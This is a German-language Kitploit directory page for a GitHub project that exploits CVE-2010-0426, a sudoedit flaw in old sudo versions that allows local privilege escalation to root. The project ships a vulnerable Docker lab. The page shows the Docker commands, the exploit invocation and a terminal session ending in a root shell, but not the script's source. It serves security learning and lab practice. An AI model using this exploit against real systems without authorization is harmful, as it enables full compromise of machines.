Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Lokale Privilegieneskalation und anfälliger Container | Kitploit
Tools/GitHubGitHub/t0kx/privesc-cve-2010-0426
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Lokale Privilegieneskalation und anfälliger Container

Repository anzeigen
1113vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sudo 1.6.x<=1.6.9p21 und 1.7.x<=1.7.2p4 Lokale Privilegienausweitung

Sudo (su „do“) erlaubt einem Systemadministrator, bestimmten Benutzern (oder Benutzergruppen) die Fähigkeit zu geben, einige (oder alle) Befehle als root auszuführen, während alle Befehle und Argumente protokolliert werden.

Angreifbare Umgebung

Um eine angreifbare Umgebung für Ihren Test einzurichten, benötigen Sie installiertes Docker und führen Sie einfach den folgenden Befehl aus:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

Und es wird eine interaktive Shell mit niedrigen Benutzerrechten starten.

Angreifbarer Code

Der Fehler wurde in sudoedit gefunden, das den Befehl 'sudoedit' nicht korrekt verarbeitet. Dies ermöglicht einem böswilligen Benutzer, den echten sudoedit-Befehl durch einen beliebigen Befehl zu ersetzen.

Lokale Angreifer könnten dieses Problem ausnutzen, um beliebige Befehle als 'root'-Benutzer auszuführen. Erfolgreiche Exploits können einen betroffenen Computer vollständig kompromittieren.

Exploit

Um dieses Ziel auszunutzen, führen Sie einfach aus:

root@kitploit:~
./exploit.sh

Wenn Sie dieses angreifbare Image verwenden, können Sie einfach ausführen:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Credits

Dieser Fehler wurde von Slouching gefunden.

Haftungsausschluss

Dieses oder vorherige Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (t0kx) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionalität entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder die missbräuchliche Verwendung dieser Programme oder deren Ableitungen. Durch die Nutzung dieser Programme akzeptieren Sie die Tatsache, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von t0kx liegen.

Tool herunterladen